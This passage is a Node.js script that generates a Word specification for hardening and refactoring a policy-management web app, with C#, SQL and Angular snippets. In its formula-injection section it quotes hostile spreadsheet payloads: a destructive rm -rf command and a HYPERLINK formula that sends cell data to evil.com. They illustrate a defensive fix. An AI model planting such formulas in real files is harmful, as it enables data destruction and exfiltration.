const {
  Document, Packer, Paragraph, TextRun, Table, TableRow, TableCell,
  Header, Footer, AlignmentType, HeadingLevel, BorderStyle, WidthType,
  ShadingType, VerticalAlign, PageNumber, PageBreak, LevelFormat,
  TableOfContents, InternalHyperlink, Bookmark, ExternalHyperlink
} = require('docx');
const fs = require('fs');

// ─── COLOUR PALETTE ───────────────────────────────────────────
const C = {
  navy: "0F172A",
  indigo: "4F46E5",
  indigoDark: "3730A3",
  indigoLight: "818CF8",
  teal: "0D9488",
  emerald: "059669",
  rose: "E11D48",
  amber: "D97706",
  sky: "0284C7",
  slate600: "475569",
  slate400: "94A3B8",
  slate200: "E2E8F0",
  slate100: "F1F5F9",
  slate50: "F8FAFC",
  white: "FFFFFF",
  headerBg: "1E1B4B",
  altRow: "F8F7FF",
  codeBg: "1E293B",
  codeText: "E2E8F0",
  // Section header backgrounds
  secSecurity: "FFF1F2",
  secPerf: "ECFDF5",
  secArch: "EFF6FF",
  secDesign: "FAF5FF",
  secFeature: "FFFBEB",
  secTest: "F0FDF4",
};

// ─── BORDER HELPERS ────────────────────────────────────────────
const border = (color = C.slate200, size = 4) => ({
  style: BorderStyle.SINGLE, size, color
});
const cellBorders = (color = C.slate200) => ({
  top: border(color), bottom: border(color),
  left: border(color), right: border(color),
});
const noBorder = () => ({
  top: { style: BorderStyle.NONE, size: 0, color: "FFFFFF" },
  bottom: { style: BorderStyle.NONE, size: 0, color: "FFFFFF" },
  left: { style: BorderStyle.NONE, size: 0, color: "FFFFFF" },
  right: { style: BorderStyle.NONE, size: 0, color: "FFFFFF" },
});

// ─── PARAGRAPH HELPERS ─────────────────────────────────────────
const h1 = (text, bookmarkId) => new Paragraph({
  heading: HeadingLevel.HEADING_1,
  spacing: { before: 400, after: 200 },
  children: bookmarkId
    ? [new Bookmark({ id: bookmarkId, children: [new TextRun({ text, font: "Arial", size: 32, bold: true, color: C.headerBg })] })]
    : [new TextRun({ text, font: "Arial", size: 32, bold: true, color: C.headerBg })],
});

const h2 = (text, bookmarkId) => new Paragraph({
  heading: HeadingLevel.HEADING_2,
  spacing: { before: 320, after: 140 },
  children: bookmarkId
    ? [new Bookmark({ id: bookmarkId, children: [new TextRun({ text, font: "Arial", size: 26, bold: true, color: C.indigo })] })]
    : [new TextRun({ text, font: "Arial", size: 26, bold: true, color: C.indigo })],
});

const h3 = (text) => new Paragraph({
  heading: HeadingLevel.HEADING_3,
  spacing: { before: 240, after: 100 },
  children: [new TextRun({ text, font: "Arial", size: 22, bold: true, color: C.slate600 })],
});

const h4 = (text) => new Paragraph({
  heading: HeadingLevel.HEADING_4,
  spacing: { before: 180, after: 80 },
  children: [new TextRun({ text, font: "Arial", size: 20, bold: true, color: C.indigoDark })],
});

const body = (text, opts = {}) => new Paragraph({
  spacing: { before: 60, after: 100 },
  children: [new TextRun({ text, font: "Arial", size: 20, color: "374151", ...opts })],
});

const bodyBold = (text) => body(text, { bold: true });

const bullet = (text, level = 0) => new Paragraph({
  numbering: { reference: "bullets", level },
  spacing: { before: 40, after: 60 },
  children: [new TextRun({ text, font: "Arial", size: 20, color: "374151" })],
});

const numberedItem = (text, level = 0) => new Paragraph({
  numbering: { reference: "numbers", level },
  spacing: { before: 40, after: 60 },
  children: [new TextRun({ text, font: "Arial", size: 20, color: "374151" })],
});

const codeBlock = (lines) => {
  const paras = [];
  for (const line of lines) {
    paras.push(new Paragraph({
      spacing: { before: 20, after: 20, line: 276 },
      shading: { fill: C.codeBg, type: ShadingType.CLEAR },
      indent: { left: 200, right: 200 },
      children: [new TextRun({ text: line || " ", font: "Courier New", size: 16, color: C.codeText })],
    }));
  }
  return paras;
};

const note = (text, color = C.amber, bgColor = "FFFBEB") => new Paragraph({
  spacing: { before: 100, after: 100 },
  indent: { left: 360, right: 180 },
  border: { left: { style: BorderStyle.SINGLE, size: 16, color } },
  shading: { fill: bgColor, type: ShadingType.CLEAR },
  children: [new TextRun({ text, font: "Arial", size: 18, color: "374151", italics: true })],
});

const spacer = (space = 160) => new Paragraph({ spacing: { before: space, after: 0 }, children: [new TextRun("")] });

const divider = () => new Paragraph({
  spacing: { before: 160, after: 160 },
  border: { bottom: { style: BorderStyle.SINGLE, size: 6, color: C.slate200 } },
  children: [new TextRun("")],
});

const pageBreak = () => new Paragraph({ children: [new PageBreak()] });

// ─── TABLE HELPERS ─────────────────────────────────────────────
const TABLE_WIDTH = 9360;

const makeHeaderRow = (cols, widths, bgColor = C.indigo) => new TableRow({
  tableHeader: true,
  children: cols.map((text, i) => new TableCell({
    width: { size: widths[i], type: WidthType.DXA },
    borders: cellBorders(C.indigoDark),
    shading: { fill: bgColor, type: ShadingType.CLEAR },
    margins: { top: 100, bottom: 100, left: 140, right: 140 },
    verticalAlign: VerticalAlign.CENTER,
    children: [new Paragraph({
      children: [new TextRun({ text, font: "Arial", size: 18, bold: true, color: C.white })],
    })],
  }))
});

const makeDataRow = (cols, widths, isAlt = false, colColors = []) => new TableRow({
  children: cols.map((text, i) => {
    const isCode = typeof text === 'string' && (text.startsWith('`') && text.endsWith('`'));
    const cleanText = isCode ? text.slice(1, -1) : (text || "—");
    const cellColor = colColors[i] || null;
    return new TableCell({
      width: { size: widths[i], type: WidthType.DXA },
      borders: cellBorders("E2E8F0"),
      shading: { fill: isAlt ? "F8F7FF" : C.white, type: ShadingType.CLEAR },
      margins: { top: 80, bottom: 80, left: 140, right: 140 },
      verticalAlign: VerticalAlign.TOP,
      children: [new Paragraph({
        children: [new TextRun({
          text: cleanText,
          font: isCode ? "Courier New" : "Arial",
          size: isCode ? 17 : 19,
          color: cellColor || (isCode ? C.indigo : "374151"),
        })],
      })],
    });
  })
});

const makeTable = (headers, rows, widths, headerBg = C.indigo) => new Table({
  width: { size: TABLE_WIDTH, type: WidthType.DXA },
  columnWidths: widths,
  rows: [
    makeHeaderRow(headers, widths, headerBg),
    ...rows.map((row, i) => makeDataRow(row, widths, i % 2 === 1))
  ],
});

// ─── SECTION LABEL ─────────────────────────────────────────────
const sectionLabel = (text, bg = C.indigo) => new Paragraph({
  spacing: { before: 200, after: 120 },
  shading: { fill: bg, type: ShadingType.CLEAR },
  children: [
    new TextRun({ text: "  " }),
    new TextRun({ text, font: "Arial", size: 18, bold: true, color: C.white, allCaps: true }),
  ],
});

const statusChip = (label, color) => new TextRun({
  text: ` ${label} `,
  font: "Arial", size: 17, bold: true, color: C.white,
  highlight: color === C.rose ? "red" : (color === C.emerald ? "green" : "yellow"),
});

// ─── COVER PAGE ────────────────────────────────────────────────
const coverPage = () => [
  spacer(1200),
  new Paragraph({
    alignment: AlignmentType.CENTER,
    spacing: { before: 0, after: 80 },
    children: [new TextRun({ text: "PolicyManager", font: "Arial", size: 72, bold: true, color: C.indigo })],
  }),
  new Paragraph({
    alignment: AlignmentType.CENTER,
    spacing: { before: 0, after: 60 },
    children: [new TextRun({ text: "Technical Modification Specification", font: "Arial", size: 44, bold: false, color: C.slate600 })],
  }),
  new Paragraph({
    alignment: AlignmentType.CENTER,
    spacing: { before: 80, after: 60 },
    border: {
      bottom: { style: BorderStyle.SINGLE, size: 8, color: C.indigoLight, space: 1 },
      top: { style: BorderStyle.SINGLE, size: 8, color: C.indigoLight, space: 1 },
    },
    children: [new TextRun({ text: "   Full-Stack Implementation Guide — v3.0   ", font: "Arial", size: 24, color: C.indigoDark })],
  }),
  spacer(120),
  new Paragraph({
    alignment: AlignmentType.CENTER,
    spacing: { before: 0, after: 60 },
    children: [new TextRun({ text: "ASP.NET Core 8  ·  Angular 17  ·  SQL Server  ·  Google Gemini AI", font: "Arial", size: 22, color: C.slate400 })],
  }),
  spacer(600),
  // Meta info table
  new Table({
    width: { size: 6000, type: WidthType.DXA },
    columnWidths: [2400, 3600],
    rows: [
      ["Document Type", "Technical Modification Specification"],
      ["Version", "3.0"],
      ["Prepared By", "Engineering Team"],
      ["Source Document", "Enhancement Review v2.0"],
      ["Date", new Date().toLocaleDateString("en-IN", { day: "2-digit", month: "long", year: "numeric" })],
      ["Sprint Coverage", "Sprint 1 – Sprint 8 (16 Weeks)"],
    ].map(([k, v], i) => new TableRow({
      children: [
        new TableCell({
          width: { size: 2400, type: WidthType.DXA },
          borders: cellBorders("C7D2FE"),
          shading: { fill: "EEF2FF", type: ShadingType.CLEAR },
          margins: { top: 80, bottom: 80, left: 140, right: 140 },
          children: [new Paragraph({ children: [new TextRun({ text: k, font: "Arial", size: 19, bold: true, color: C.indigoDark })] })],
        }),
        new TableCell({
          width: { size: 3600, type: WidthType.DXA },
          borders: cellBorders("C7D2FE"),
          shading: { fill: i % 2 === 0 ? C.white : C.altRow, type: ShadingType.CLEAR },
          margins: { top: 80, bottom: 80, left: 140, right: 140 },
          children: [new Paragraph({ children: [new TextRun({ text: v, font: "Arial", size: 19, color: "374151" })] })],
        }),
      ]
    }))
  }),
  pageBreak(),
];

// ─── SECTION 1 — SECURITY ──────────────────────────────────────
const section1 = () => [
  h1("Section 1 — Security Hardening", "sec1"),
  body("All security modifications are classified as Critical Priority and must be completed in Sprint 1 (Weeks 1–2) before any other development begins. These changes address vulnerabilities found in the existing codebase that could expose production data."),
  spacer(),

  h2("1.1  Secret Management — Remove Hardcoded Credentials", "sec1-1"),
  h3("Problem"),
  body("The Gemini API key, JWT signing key, and SMTP credentials are stored directly in appsettings.json and referenced inline in Services.cs. Any developer with repository access can read these values. If the repository is public or leaked, credentials are immediately compromised."),
  note("Risk Level: CRITICAL — Credential leakage can result in unauthorized API usage, financial loss from API billing abuse, and complete authentication bypass.", C.rose, "FFF1F2"),
  spacer(),
  h3("Files to Modify"),
  makeTable(
    ["File", "Current Problem", "Required Action"],
    [
      ["appsettings.json", "GeminiApi:ApiKey stored in plain text", "Remove value — keep key name with empty string placeholder only"],
      ["appsettings.json", "JwtSettings:SecretKey hard-coded", "Remove value — key must be 256-bit minimum"],
      ["appsettings.json", "EmailSettings:SmtpPassword plain text", "Remove — use environment variable or User Secrets"],
      ["Services.cs → AuthService", "Reads JwtSettings directly from IConfiguration", "No change — config path is fine; only the value source changes"],
      ["Program.cs", "No secret provider registered", "Add User Secrets in Development; Azure Key Vault in Production"],
    ],
    [3200, 3080, 3080]
  ),
  spacer(),
  h3("Implementation — appsettings.json (After)"),
  ...codeBlock([
    '{',
    '  "GeminiApi": {',
    '    "ApiKey": "",         // DO NOT put real key here — use env var: GeminiApi__ApiKey',
    '    "Model": "gemini-1.5-flash",',
    '    "Endpoint": "https://generativelanguage.googleapis.com/v1/models"',
    '  },',
    '  "JwtSettings": {',
    '    "SecretKey": "",      // DO NOT put real key here — use env var: JwtSettings__SecretKey',
    '    "Issuer": "PolicyManagerAPI",',
    '    "Audience": "PolicyManagerClient",',
    '    "ExpirationInMinutes": "60"',
    '  }',
    '}',
  ]),
  spacer(),
  h3("Implementation — Program.cs (Add Secret Provider)"),
  ...codeBlock([
    'var builder = WebApplication.CreateBuilder(args);',
    '',
    '// Development: use User Secrets (dotnet user-secrets set "GeminiApi:ApiKey" "AIza...")',
    'if (builder.Environment.IsDevelopment())',
    '{',
    '    builder.Configuration.AddUserSecrets<Program>();',
    '}',
    '',
    '// Production: use environment variables (GeminiApi__ApiKey=AIza...)',
    '// Set in Docker Compose, Azure App Service, or system environment',
    'builder.Configuration.AddEnvironmentVariables();',
  ]),
  spacer(200),

  h2("1.2  Rate Limiting on Authentication Endpoints", "sec1-2"),
  h3("Problem"),
  body("The /api/auth/login endpoint has no brute-force protection. An attacker can make unlimited login attempts to enumerate passwords. The /api/auth/register endpoint similarly has no throttle, enabling account spam."),
  note("Risk Level: HIGH — Without rate limiting, a dictionary attack on admin accounts is trivial. Default credential pairs (admin/admin123) can be tested in seconds.", C.rose, "FFF1F2"),
  spacer(),
  h3("Package to Install"),
  ...codeBlock(["dotnet add package AspNetCoreRateLimit"]),
  spacer(),
  h3("Implementation — Program.cs"),
  ...codeBlock([
    'builder.Services.AddMemoryCache();',
    'builder.Services.Configure<IpRateLimitOptions>(options =>',
    '{',
    '    options.EnableEndpointRateLimiting = true;',
    '    options.StackBlockedRequests = false;',
    '    options.HttpStatusCode = 429;',
    '    options.RealIpHeader = "X-Real-IP";',
    '    options.GeneralRules = new List<RateLimitRule>',
    '    {',
    '        new RateLimitRule',
    '        {',
    '            Endpoint = "POST:/api/auth/login",',
    '            Period = "1m",',
    '            Limit = 5,          // 5 login attempts per minute per IP',
    '        },',
    '        new RateLimitRule',
    '        {',
    '            Endpoint = "POST:/api/auth/register",',
    '            Period = "1h",',
    '            Limit = 3,          // 3 registrations per hour per IP',
    '        },',
    '    };',
    '});',
    'builder.Services.AddSingleton<IIpPolicyStore, MemoryCacheIpPolicyStore>();',
    'builder.Services.AddSingleton<IRateLimitCounterStore, MemoryCacheRateLimitCounterStore>();',
    'builder.Services.AddSingleton<IIpRateLimitProcessor, IpRateLimitProcessor>();',
    'builder.Services.AddSingleton<IRateLimitConfiguration, RateLimitConfiguration>();',
    '',
    '// In middleware pipeline (before UseRouting):',
    'app.UseIpRateLimiting();',
  ]),
  spacer(200),

  h2("1.3  CORS Restriction for Production", "sec1-3"),
  h3("Problem"),
  body("The current CORS policy allows any origin with credentials. In production, this means any website can make authenticated API calls on behalf of a logged-in user, enabling Cross-Site Request Forgery attacks."),
  h3("Implementation — Program.cs"),
  ...codeBlock([
    'builder.Services.AddCors(options =>',
    '{',
    '    options.AddPolicy("DevelopmentCors", policy =>',
    '        policy.WithOrigins("http://localhost:4200")',
    '              .AllowAnyMethod()',
    '              .AllowAnyHeader()',
    '              .AllowCredentials());',
    '',
    '    options.AddPolicy("ProductionCors", policy =>',
    '        policy.WithOrigins(',
    '                "https://policymanager.yourdomain.com",',
    '                "https://app.policymanager.in")',
    '              .AllowAnyMethod()',
    '              .AllowAnyHeader()',
    '              .AllowCredentials()',
    '              .SetPreflightMaxAge(TimeSpan.FromMinutes(10)));',
    '});',
    '',
    '// Apply based on environment:',
    'if (app.Environment.IsDevelopment())',
    '    app.UseCors("DevelopmentCors");',
    'else',
    '    app.UseCors("ProductionCors");',
  ]),
  spacer(200),

  h2("1.4  HTTPS Enforcement & Security Headers", "sec1-4"),
  h3("Implementation — Program.cs"),
  ...codeBlock([
    '// Add HTTPS redirect and HSTS',
    'app.UseHttpsRedirection();',
    'app.UseHsts();',
    '',
    '// Add security headers middleware',
    'app.Use(async (context, next) =>',
    '{',
    '    context.Response.Headers.Add("X-Content-Type-Options", "nosniff");',
    '    context.Response.Headers.Add("X-Frame-Options", "DENY");',
    '    context.Response.Headers.Add("X-XSS-Protection", "1; mode=block");',
    '    context.Response.Headers.Add("Referrer-Policy", "strict-origin-when-cross-origin");',
    '    context.Response.Headers.Add(',
    '        "Content-Security-Policy",',
    '        "default-src \'self\'; script-src \'self\'; style-src \'self\' \'unsafe-inline\'");',
    '    await next();',
    '});',
  ]),
  spacer(200),

  h2("1.5  Excel Input Sanitization (Formula Injection Fix)", "sec1-5"),
  h3("Problem"),
  body("The Excel import in UploadPoliciesFromExcelAsync reads cell values directly without sanitization. A malicious Excel file containing formulas like =SYSTEM(\"rm -rf /\") or =HYPERLINK(\"http://evil.com/steal?data=\"&A1) can execute when the file is opened in Excel by an admin."),
  h3("Implementation — Add to Services.cs UploadPoliciesFromExcelAsync"),
  ...codeBlock([
    'private static string SanitizeCellValue(string? rawValue)',
    '{',
    '    if (string.IsNullOrWhiteSpace(rawValue)) return string.Empty;',
    '    var trimmed = rawValue.Trim();',
    '    // Strip formula injection characters at the start of the cell',
    '    var dangerousStarts = new[] { "=", "+", "-", "@", "\\t", "\\r" };',
    '    foreach (var prefix in dangerousStarts)',
    '    {',
    '        if (trimmed.StartsWith(prefix))',
    `            return "'" + trimmed;  // Prefix with apostrophe to neutralize`,
    '    }',
    '    return trimmed;',
    '}',
    '',
    '// Apply in the row parsing loop — replace GetVal() calls:',
    'string GetVal(int idx) =>',
    '    (idx >= 0 && idx < dataTable.Columns.Count)',
    '        ? SanitizeCellValue(row[idx]?.ToString())',
    '        : string.Empty;',
  ]),
  pageBreak(),
];

// ─── SECTION 2 — PERFORMANCE ───────────────────────────────────
const section2 = () => [
  h1("Section 2 — Performance Optimizations", "sec2"),
  body("These changes address identified bottlenecks in both backend query patterns and frontend rendering. Performance optimizations are targeted for Sprint 2 (Weeks 3–4)."),
  spacer(),

  h2("2.1  Dashboard Stats — Eliminate N+1 Queries", "sec2-1"),
  h3("Problem"),
  body("DashboardService.GetStatsAsync makes 6+ sequential database calls: GetCurrentMonthBudget, GetNextMonthBudget, GetCurrentFYBudget, GetCurrentFYIncome, GetNextYearForecast, and GetFullFYForecastList — each doing a full policy table scan. On a portfolio with 500+ policies, this causes 400–800ms response times."),
  h3("New Stored Procedure — sp_GetDashboardStats"),
  ...codeBlock([
    'CREATE PROCEDURE sp_GetDashboardStats',
    '    @MemberNames NVARCHAR(MAX),   -- Comma-separated or JSON array',
    '    @FYStart     DATE,',
    '    @FYEnd       DATE,',
    '    @NextFYStart DATE,',
    '    @NextFYEnd   DATE',
    'AS',
    'BEGIN',
    '    SET NOCOUNT ON;',
    '',
    '    -- Result Set 1: Core aggregates',
    '    SELECT',
    '        SUM(CASE WHEN p.NextInstallmentDate BETWEEN @FYStart AND @FYEnd',
    '                 THEN ISNULL(p.InstallmentAmount, p.PremiumAmount) ELSE 0 END) AS CurrentFYBudget,',
    '        SUM(CASE WHEN p.MaturityDate BETWEEN @FYStart AND @FYEnd',
    '                 THEN ISNULL(p.TotalMaturityAmount, p.CoverageAmount) ELSE 0 END) AS CurrentFYIncome,',
    '        COUNT(CASE WHEN p.InstallmentType = \'One Time\' AND p.Status = \'Active\'',
    '                   THEN 1 END) AS OneTimeCount,',
    '        SUM(CASE WHEN p.InstallmentType = \'One Time\' AND p.Status = \'Active\'',
    '                 THEN p.PremiumAmount ELSE 0 END) AS OneTimeTotal',
    '    FROM Policies p',
    '    INNER JOIN FamilyMembers fm ON p.FamilyMemberId = fm.Id',
    '    WHERE p.IsDeleted = 0 AND p.Status = \'Active\'',
    '      AND fm.Name IN (SELECT value FROM STRING_SPLIT(@MemberNames, \',\'));',
    'END',
  ]),
  spacer(),
  h3("Service Update — DashboardService.cs"),
  ...codeBlock([
    'public async Task<DashboardStatsDto> GetStatsAsync(string[] selectedMembers)',
    '{',
    '    var memberList = string.Join(",", selectedMembers);',
    '    var (fyStart, fyEnd) = FYHelper.GetCurrentFYRange();',
    '    var nextFYStart = fyEnd.AddDays(1);',
    '    var nextFYEnd = nextFYStart.AddYears(1).AddDays(-1);',
    '',
    '    // Single call replaces 6 sequential queries',
    '    var result = await _context.Database.SqlQueryRaw<DashboardRawDto>(',
    '        "EXEC sp_GetDashboardStats @p0, @p1, @p2, @p3, @p4",',
    '        memberList, fyStart, fyEnd, nextFYStart, nextFYEnd',
    '    ).FirstOrDefaultAsync();',
    '',
    '    return _mapper.Map<DashboardStatsDto>(result);',
    '}',
  ]),
  spacer(200),

  h2("2.2  Investment Forecast — Redis Distributed Caching", "sec2-2"),
  h3("Problem"),
  body("ProjectInstallments loops through every policy for every month in a fiscal year — O(policies × 12) computations on every page load. For 200 policies, this is 2,400 iterations per request with no caching."),
  h3("Package to Install"),
  ...codeBlock(["dotnet add package Microsoft.Extensions.Caching.StackExchangeRedis"]),
  h3("Program.cs — Add Redis"),
  ...codeBlock([
    'builder.Services.AddStackExchangeRedisCache(options =>',
    '{',
    '    options.Configuration = builder.Configuration["Redis:ConnectionString"];',
    '    options.InstanceName = "PolicyMgr:";',
    '});',
  ]),
  h3("InvestmentForecastService.cs — Add Cache Layer"),
  ...codeBlock([
    'public class InvestmentForecastService : IInvestmentForecastService',
    '{',
    '    private readonly AppDbContext _context;',
    '    private readonly IDistributedCache _cache;',
    '',
    '    public async Task<InvestmentForecastDto> GetFullForecastAsync(',
    '        int? fiscalYear, string[] selectedMembers)',
    '    {',
    '        var fyYear = fiscalYear ?? FYHelper.GetCurrentFYStartYear();',
    '        var memberKey = string.Join("-", selectedMembers.OrderBy(m => m));',
    '        var cacheKey = $"forecast:{fyYear}:{memberKey.GetHashCode()}";',
    '',
    '        // Try cache first',
    '        var cached = await _cache.GetStringAsync(cacheKey);',
    '        if (cached != null)',
    '            return JsonSerializer.Deserialize<InvestmentForecastDto>(cached)!;',
    '',
    '        // Compute forecast',
    '        var result = await ComputeForecastAsync(fyYear, selectedMembers);',
    '',
    '        // Cache for 15 minutes',
    '        var cacheOptions = new DistributedCacheEntryOptions',
    '        {',
    '            AbsoluteExpirationRelativeToNow = TimeSpan.FromMinutes(15)',
    '        };',
    '        await _cache.SetStringAsync(cacheKey,',
    '            JsonSerializer.Serialize(result), cacheOptions);',
    '',
    '        return result;',
    '    }',
    '',
    '    // Invalidate cache when a payment is recorded or policy is updated',
    '    public async Task InvalidateForecastCacheAsync(int userId)',
    '    {',
    '        // Pattern-based invalidation: remove all forecast keys',
    '        // Call this from MarkAsPaidAsync and UpdatePolicyAsync',
    '    }',
    '}',
  ]),
  spacer(200),

  h2("2.3  Excel Import — Bulk Insert with EFCore.BulkExtensions", "sec2-3"),
  h3("Problem"),
  body("The current import does AnyAsync per row to check for duplicate policy numbers, then SaveChangesAsync after all rows — this is O(n) database reads for the duplicate check. For a 500-row import, that is 500 separate SELECT queries before a single INSERT."),
  h3("Package to Install"),
  ...codeBlock(["dotnet add package EFCore.BulkExtensions"]),
  h3("Modified UploadPoliciesFromExcelAsync — Key Changes"),
  ...codeBlock([
    '// BEFORE — Per-row duplicate check (500 queries for 500 rows):',
    'if (existingPolicyNumbers.Contains(policyNumber) ||',
    '    processedInFile.Contains(policyNumber)) { ... }',
    '',
    '// AFTER — Bulk pre-load all existing numbers once:',
    'var existingPolicyNumbers = new HashSet<string>(',
    '    await _context.Policies',
    '        .AsNoTracking()',
    '        .Select(p => p.PolicyNumber)',
    '        .ToListAsync()',
    ');',
    '',
    '// Collect all valid new policies first, then bulk insert:',
    'if (newPolicies.Any())',
    '{',
    '    var bulkConfig = new BulkConfig',
    '    {',
    '        BatchSize = 100,',
    '        SetOutputIdentity = false,',
    '        PreserveInsertOrder = false,',
    '    };',
    '    await _context.BulkInsertAsync(newPolicies, bulkConfig);',
    '}',
    '// This reduces 500-row import from ~5s to ~200ms',
  ]),
  spacer(200),

  h2("2.4  Frontend — Fix Notification Service Subscription Leak", "sec2-4"),
  h3("File: notification.service.ts"),
  h3("Problem"),
  body("startPolling() creates an interval observable that is never unsubscribed. When a user logs out and logs back in, a second polling interval starts, then a third — each making API calls and leaking memory."),
  ...codeBlock([
    '// BEFORE — leaking subscription:',
    'startPolling(): void {',
    '    interval(this.pollingIntervalMs).pipe(',
    '        startWith(0),',
    '        switchMap(() => this.getNotifications())',
    '    ).subscribe({ next: (res) => { ... } });',
    '}',
    '',
    '// AFTER — properly managed subscription:',
    'private pollingSubscription?: Subscription;',
    '',
    'startPolling(): void {',
    '    this.stopPolling();  // Always stop before starting',
    '    this.pollingSubscription = interval(this.pollingIntervalMs).pipe(',
    '        startWith(0),',
    '        switchMap(() => this.getNotifications())',
    '    ).subscribe({',
    '        next: (res) => { if (res.data) this._summary$.next(res.data); },',
    '        error: () => {}',
    '    });',
    '}',
    '',
    'stopPolling(): void {',
    '    this.pollingSubscription?.unsubscribe();',
    '    this.pollingSubscription = undefined;',
    '}',
    '',
    '// Call stopPolling() in AuthService.logout()',
  ]),
  spacer(200),

  h2("2.5  Frontend — Fix Chart Destroy/Recreate Pattern", "sec2-5"),
  h3("Files: forecast-chart.component.ts, investment-forecast.component.ts"),
  ...codeBlock([
    '// BEFORE — destroys and recreates chart on every data change:',
    'if (this.chart) this.chart.destroy();',
    'this.chart = new Chart(ctx, config);',
    '',
    '// AFTER — update data in place (no flicker, no memory alloc):',
    'private updateChart(): void {',
    '    if (!this.chart) {',
    '        this.createChart();',
    '        return;',
    '    }',
    '    this.chart.data.labels = this.forecasts.map(f => f.month);',
    '    this.chart.data.datasets[0].data = this.forecasts.map(f => f.totalAmount);',
    '    this.chart.update("active");   // "active" = animated update',
    '}',
  ]),
  spacer(200),

  h2("2.6  Frontend — Policy List Default Page Size", "sec2-6"),
  h3("File: policy-list.component.ts"),
  ...codeBlock([
    '// BEFORE:',
    'filter: PolicyFilter = {',
    '    pageSize: 100,   // Loads 100 rows on every navigation — slow on mobile',
    '    ...',
    '};',
    '',
    '// AFTER:',
    'filter: PolicyFilter = {',
    '    pageSize: 20,    // Reasonable default; user can change to 50/100/200',
    '    ...',
    '};',
    '',
    '// Also add virtual scrolling for large datasets — add to module imports:',
    '// ScrollingModule from @angular/cdk/scrolling',
  ]),
  pageBreak(),
];

// ─── SECTION 3 — CODE QUALITY ──────────────────────────────────
const section3 = () => [
  h1("Section 3 — Code Quality Refactoring", "sec3"),
  body("These changes improve long-term maintainability, testability, and developer experience. They are targeted for Sprint 1–2 alongside security fixes."),
  spacer(),

  h2("3.1  Split Services.cs into Individual Files", "sec3-1"),
  h3("Problem"),
  body("Services.cs contains 1,100+ lines and 8 distinct service classes in a single file. This makes Git diffs enormous, causes merge conflicts, and violates the Single Responsibility Principle."),
  h3("New File Structure"),
  makeTable(
    ["New File", "Contains", "Approx. Lines"],
    [
      ["Services/AuthService.cs", "IAuthService, AuthService", "~80"],
      ["Services/PolicyService.cs", "IPolicyService, PolicyService", "~500"],
      ["Services/PolicyTypeService.cs", "IPolicyTypeService, PolicyTypeService", "~60"],
      ["Services/DashboardService.cs", "IDashboardService, DashboardService", "~200"],
      ["Services/FamilyMemberService.cs", "IFamilyMemberService, FamilyMemberService", "~150"],
      ["Services/AuditLogService.cs", "IAuditLogService, AuditLogService", "~60"],
      ["Services/ReminderService.cs", "IReminderService, ReminderService", "~120"],
      ["Services/EmailService.cs", "Already separate — no change needed", "Existing"],
    ],
    [3000, 4200, 2160]
  ),
  note("Each file should have its own namespace declaration at the top: namespace PolicyManager.API.Services;", C.teal, "ECFDF5"),
  spacer(200),

  h2("3.2  PolicyConstants.cs — Eliminate Magic Strings", "sec3-2"),
  h3("New File: PolicyManager.API/Constants/PolicyConstants.cs"),
  ...codeBlock([
    'namespace PolicyManager.API.Constants;',
    '',
    'public static class PolicyConstants',
    '{',
    '    public static class Status',
    '    {',
    '        public const string Active    = "Active";',
    '        public const string Expired   = "Expired";',
    '        public const string Pending   = "Pending";',
    '        public const string Cancelled = "Cancelled";',
    '        public const string Completed = "Completed";',
    '    }',
    '',
    '    public static class InstallmentType',
    '    {',
    '        public const string OneTime    = "One Time";',
    '        public const string Monthly    = "Monthly";',
    '        public const string Quarterly  = "Quarterly";',
    '        public const string HalfYearly = "Half-Yearly";',
    '        public const string Yearly     = "Yearly";',
    '    }',
    '',
    '    public static class UserRole',
    '    {',
    '        public const string Admin = "Admin";',
    '        public const string User  = "User";',
    '        public const string Agent = "Agent";',
    '    }',
    '',
    '    public static class DocumentType',
    '    {',
    '        public const string Policy  = "Policy";',
    '        public const string Receipt = "Receipt";',
    '        public const string Claim   = "Claim";',
    '    }',
    '',
    '    public static class CacheKeys',
    '    {',
    '        public static string Forecast(int fy, int memberHash)',
    '            => $"forecast:{fy}:{memberHash}";',
    '        public static string DashboardStats(int memberHash)',
    '            => $"dashboard:stats:{memberHash}";',
    '    }',
    '}',
  ]),
  spacer(200),

  h2("3.3  Global Error Handler — Angular Frontend", "sec3-3"),
  h3("New File: src/app/core/global-error-handler.ts"),
  ...codeBlock([
    'import { ErrorHandler, Injectable, NgZone } from "@angular/core";',
    'import { Router } from "@angular/router";',
    'import { ToastService } from "../services/toast.service";',
    '',
    '@Injectable()',
    'export class GlobalErrorHandler implements ErrorHandler {',
    '    constructor(',
    '        private zone: NgZone,',
    '        private toast: ToastService,',
    '        private router: Router',
    '    ) {}',
    '',
    '    handleError(error: any): void {',
    '        const message = error?.message || "An unexpected error occurred.";',
    '        const status  = error?.status;',
    '',
    '        console.error("[GlobalErrorHandler]", error);',
    '',
    '        this.zone.run(() => {',
    '            if (status === 401) {',
    '                this.router.navigate(["/login"]);',
    '                return;',
    '            }',
    '            if (status === 403) {',
    '                this.toast.error("You do not have permission to perform this action.");',
    '                return;',
    '            }',
    '            if (status === 0 || status === 503) {',
    '                this.toast.error("Server is unreachable. Please check your connection.");',
    '                return;',
    '            }',
    '            this.toast.error(message.length > 120 ? message.substring(0, 120) + "..." : message);',
    '        });',
    '    }',
    '}',
    '',
    '// Register in app.config.ts:',
    '// { provide: ErrorHandler, useClass: GlobalErrorHandler }',
  ]),
  spacer(200),

  h2("3.4  Fix FamilyMemberService Null Return", "sec3-4"),
  h3("File: Services/FamilyMemberService.cs"),
  ...codeBlock([
    '// BEFORE — null! suppresses the compiler warning but causes runtime crash:',
    'public async Task<FamilyMemberDto> GetByIdAsync(int id)',
    '{',
    '    var member = await _context.FamilyMembers',
    '        .FirstOrDefaultAsync(m => m.Id == id);',
    '    if (member == null) return null!;   // ← BUG: NullReferenceException in production',
    '    ...',
    '}',
    '',
    '// AFTER — throw a typed exception that the ExceptionMiddleware can handle:',
    'public async Task<FamilyMemberDto> GetByIdAsync(int id)',
    '{',
    '    var member = await _context.FamilyMembers',
    '        .Include(m => m.Parent)',
    '        .Include(m => m.Children)',
    '        .Include(m => m.Policies).ThenInclude(p => p.PolicyType)',
    '        .FirstOrDefaultAsync(m => m.Id == id)',
    '        ?? throw new KeyNotFoundException($"Family member with ID {id} not found.");',
    '    ...',
    '}',
    '',
    '// ExceptionMiddleware already handles KeyNotFoundException → 404 response',
  ]),
  pageBreak(),
];

// ─── SECTION 4 — NEW FEATURES ──────────────────────────────────
const section4 = () => [
  h1("Section 4 — New Feature Implementation", "sec4"),
  body("Each new feature below is described with complete backend models, service interfaces, API endpoints, and Angular component specifications."),
  spacer(),

  h2("4.1  Portfolio Health Score", "sec4-1"),
